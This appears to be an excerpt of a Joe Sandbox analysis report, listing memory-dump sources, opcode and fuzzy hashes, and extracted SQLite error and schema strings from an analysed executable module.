                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                          • Opcode ID: 1e5e7c948760cf301929a07a706e348abcbcec31b0f3dce1069e93b05921774f
                                                                                                                                                                                                          • Instruction ID: 8838b4792cfb16b29a4ce023dc277b1b9fa53a29634d1c6cd7f5a5f2d1ee108f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e5e7c948760cf301929a07a706e348abcbcec31b0f3dce1069e93b05921774f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31E04F51F2B68353FF055BB2E8A69781251DFD4704B184434C939432FADD2CA485A210
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %s: "%s" - should this be a string literal in single-quotes?$%s: %s$%s: %s.%s$%s: %s.%s.%s$H$N$ROWID$ambiguous column name$coalesce$double-quoted string literal: "%w"$excluded$main$misuse of aliased aggregate %s$misuse of aliased window function %s$new$no such column$old$row value misused$z
                                                                                                                                                                                                          • API String ID: 0-3187542301
                                                                                                                                                                                                          • Opcode ID: d22989c4954f2225df599e1ffbcc01da95558679591f43aa7e7e0fd9f09dd032
                                                                                                                                                                                                          • Instruction ID: 6ea767943a80bf8f8faaa408df6ab02c6c13a4d2f76a7d75161a24eb4f06b38e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d22989c4954f2225df599e1ffbcc01da95558679591f43aa7e7e0fd9f09dd032
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91C28F62B0A78786EB649B159060A797BA1FB95B80F448135DAAD437FDDF3CE850CF00
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                          • API String ID: 0-767664412
                                                                                                                                                                                                          • Opcode ID: d26338cd79e127a6da74e814f339bfb35dbc7715f05c13480861dc1c9c7972f5
                                                                                                                                                                                                          • Instruction ID: 9a74edb4aa4dc26550c647c090521ac2027729bdb07e668d32ce0f412be4fbbb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d26338cd79e127a6da74e814f339bfb35dbc7715f05c13480861dc1c9c7972f5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00B138D37315984BD7588A3EF822F9D2B85D3A5348F485239F645CFFC6E92AE5018702
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: , ?$,%s(?)$4$PRAGMA %Q.page_size$compress$content$error parsing prefix parameter: %s$languageid$matchinfo$missing %s parameter in fts4 constructor$no such column: %s$notindexed$order$prefix$simple$tokenize$uncompress$unrecognized parameter: %s
                                                                                                                                                                                                          • API String ID: 0-404594414
                                                                                                                                                                                                          • Opcode ID: f80f9d41d871cb6df72d7b536e3108c8bbb9dd35af6d5dd8f3c3b51340b2c416
                                                                                                                                                                                                          • Instruction ID: 2ba1dc45f6d70ad8431526baa3621b614a107c6393c327047ba02297a75aa03d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f80f9d41d871cb6df72d7b536e3108c8bbb9dd35af6d5dd8f3c3b51340b2c416
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1D26C61B1AB4385EB188B25E860AB977A0FF85B94F244136DE6E477F8CF7CE4418740
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %Q.'%q_%s'$, NULL$, T.%Q$, T.c%d$, T.l%d$T.%Q$content$contentless_delete=1 is incompatible with columnsize=0$contentless_delete=1 requires a contentless table$contentless_unindexed=1 requires a contentless table$docsize$parse error in "%s"$rank$reserved fts5 column name: %s$reserved fts5 table name: %s$rowid$unindexed$unrecognized column option: %s
                                                                                                                                                                                                          • API String ID: 0-1703952466
                                                                                                                                                                                                          • Opcode ID: fd0e748aefeb12518fde34ef3ac1493b5a7a5701c0accf2208746b5528c8f0e9
                                                                                                                                                                                                          • Instruction ID: fa166651b08c3fb2e572d86fb72d8b3f88888c020d6897f0deba1f00a45035ca
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd0e748aefeb12518fde34ef3ac1493b5a7a5701c0accf2208746b5528c8f0e9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18525522B1E78389EB549F659460AB83BA0BB44B88F554135DE3E576F9DF3CE80183C4
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: AUTOINCREMENT not allowed on WITHOUT ROWID tables$CREATE %s %.*s$CREATE TABLE %Q.sqlite_sequence(name,seq)$PRIMARY KEY missing on table %s$SELECT*FROM"%w"."%w"$TABLE$UPDATE %Q.sqlite_master SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d$VIEW$missing datatype for %s.%s$must have at least one non-generated column$sqlite_sequence$table$tbl_name='%q' AND type!='trigger'$unknown datatype for %s.%s: "%s"$view
                                                                                                                                                                                                          • API String ID: 0-1715202245
                                                                                                                                                                                                          • Opcode ID: 26bff9bdfba57077f07abedee38eefb226d3c730016b800d8c5383d45b3d791b
                                                                                                                                                                                                          • Instruction ID: b24179acdfa07f7f75369b464841a3bb3fb84a6e168d8e9fa7f1b7e6217bd15f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26bff9bdfba57077f07abedee38eefb226d3c730016b800d8c5383d45b3d791b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6626D72B1A7838AEB609B25D060BA9B7A0FF85B88F044135DA6D477F9DF3CE5418700
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: .$:$:$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                          • API String ID: 0-3693326857
                                                                                                                                                                                                          • Opcode ID: 84064367d166328c73bafa2deacc8719837e885c81f3bc5b75f58f6c58ee12b6
                                                                                                                                                                                                          • Instruction ID: ea5e78de6f1e4b15a1fa0821f3604559a922d2049ad66c9643bfe79debccc709
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84064367d166328c73bafa2deacc8719837e885c81f3bc5b75f58f6c58ee12b6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4615B93B215984BE74DC73EFC22BAD2B956390344F484235EE45DFBC6E929E6028742
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Child page depth differs$Extends off end of page$Fragmentation of %u bytes reported as %u on page %u$Multiple uses for byte %u of page %u$Offset %u out of range %u..%u$Rowid %lld out of order$Tree %u page %u cell %u: $Tree %u page %u right child: $Tree %u page %u: $btreeInitPage() returns error code %d$free space corruption$unable to get the page. error code=%d
                                                                                                                                                                                                          • API String ID: 0-835090162
                                                                                                                                                                                                          • Opcode ID: 47aba286c961b50c6ca94960fe02a80b70722f0238a3a6d117d119632bfe6d1d
                                                                                                                                                                                                          • Instruction ID: 42d2263669226dff05be6a85a8985459194213723237df449e3dd58f848c04ce
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47aba286c961b50c6ca94960fe02a80b70722f0238a3a6d117d119632bfe6d1d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1332A13A7197928BD7648F25E060A7D7BA1F785B84F004135DAAA43BB8DF3DE446CB00
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: PRIMARY KEY$UNIQUE$UPDATE "%w".sqlite_master SET sql = sqlite_drop_column(%d, sql, %d) WHERE (type=='table' AND tbl_name=%Q COLLATE nocase)$after drop column$cannot %s %s "%s"$cannot drop %s column: "%s"$cannot drop column "%s": no other columns exist$drop column from$no such column: "%T"$q$view$virtual table
                                                                                                                                                                                                          • API String ID: 0-74819023
                                                                                                                                                                                                          • Opcode ID: 7c9c1350548b3c45b0d0cf0d64804b1f4f04c3b21d22e22a8189cc0807441005
                                                                                                                                                                                                          • Instruction ID: b93a4101b4d6ba93e97ad6a44e1b10eac95745aa393d4e71ec435d26cb9c6ee3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c9c1350548b3c45b0d0cf0d64804b1f4f04c3b21d22e22a8189cc0807441005
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06228D32B1A7868AD760CF16D060EA9B7A5FB88B84F418139DA9E477B9DF3CD445C700
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: -$-$-$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                          • API String ID: 0-3831715856
                                                                                                                                                                                                          • Opcode ID: 38ceaeefa8122eda77a6a4c0540e4d72ea643edef9484be0f76a5f63aed2900a
                                                                                                                                                                                                          • Instruction ID: c09d36d9c104749e58fd127109a5edf38d7df6172d51ce29c5624a26ce4677a7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38ceaeefa8122eda77a6a4c0540e4d72ea643edef9484be0f76a5f63aed2900a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D5147A273528847D758C63EB822F5A6BC1E7E0340F485236F691CBBD6E92DE501CB02
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$%s_segments$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$block$misuse$pB
                                                                                                                                                                                                          • API String ID: 0-4163344244
                                                                                                                                                                                                          • Opcode ID: 7ba9b2aad15968beecd978c312e8c4503ab0165667d700f5262dd59c6bd6c803
                                                                                                                                                                                                          • Instruction ID: 9324f6be820fdabcf8c2ec56750feec669be44371a5065f53636c6d4189288e5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ba9b2aad15968beecd978c312e8c4503ab0165667d700f5262dd59c6bd6c803
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45037A62B1AB4385FB148F2A9460B7937A1AF44B89F298135DE2E577F9CF7CE4418340
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %r %s BY term out of range - should be between 1 and %d$INTERSECT$LEFT$MERGE (%s)$ORDER$RIGHT$UNION$too many terms in %s BY clause$g
                                                                                                                                                                                                          • API String ID: 0-3976573709
                                                                                                                                                                                                          • Opcode ID: 923cc748c2a532d436179f4fbeec89efe2f6068ec0f17b4356e66b78e043d76d
                                                                                                                                                                                                          • Instruction ID: fbb4de19fff617434f16188e6b1c878e2486a53cb937c6b7af86b92c0ae88994
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 923cc748c2a532d436179f4fbeec89efe2f6068ec0f17b4356e66b78e043d76d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35B24D72B0A78386EB689F15D460AA97761FB84B84F148435DA6E477BDCF3DE8418F00
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: cannot open %s column for writing$cannot open table with generated columns: %s$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
                                                                                                                                                                                                          • API String ID: 0-3985037806
                                                                                                                                                                                                          • Opcode ID: f034e25158e78055e83dcab3338d85cb23f0cdd10e0e8049e84ae0044b790696
                                                                                                                                                                                                          • Instruction ID: 06f9a481b9307abb65ef4844c8ec58a1c0f4bea00e2f50b0f873a75c1f23cf70
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f034e25158e78055e83dcab3338d85cb23f0cdd10e0e8049e84ae0044b790696
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64525A72B1AB87C6EB948F2594A0BB937A4FB44B85F424136DA6D437B8DF38E550C700
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %d values for %d columns$SCAN %S$UPSERT not implemented for virtual table "%s"$cannot INSERT into generated column "%s"$cannot UPSERT a view$rows inserted$table %S has %d columns but %d values were supplied$table %S has no column named %s
                                                                                                                                                                                                          • API String ID: 0-458612905
                                                                                                                                                                                                          • Opcode ID: f67b718e77ddba9dbd2e4bd3dcfe93cd4f63a37029d537b2c9244a4cf76d0f7c
                                                                                                                                                                                                          • Instruction ID: 2053476d2efcb61cc6401123b49752d295f2ac666a95971d103e813231ce09ae
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f67b718e77ddba9dbd2e4bd3dcfe93cd4f63a37029d537b2c9244a4cf76d0f7c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9EF27172B1A6928AE764CF25C460BAD37A1FB84BC8F598135DE9D477A9DF38E440C700
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
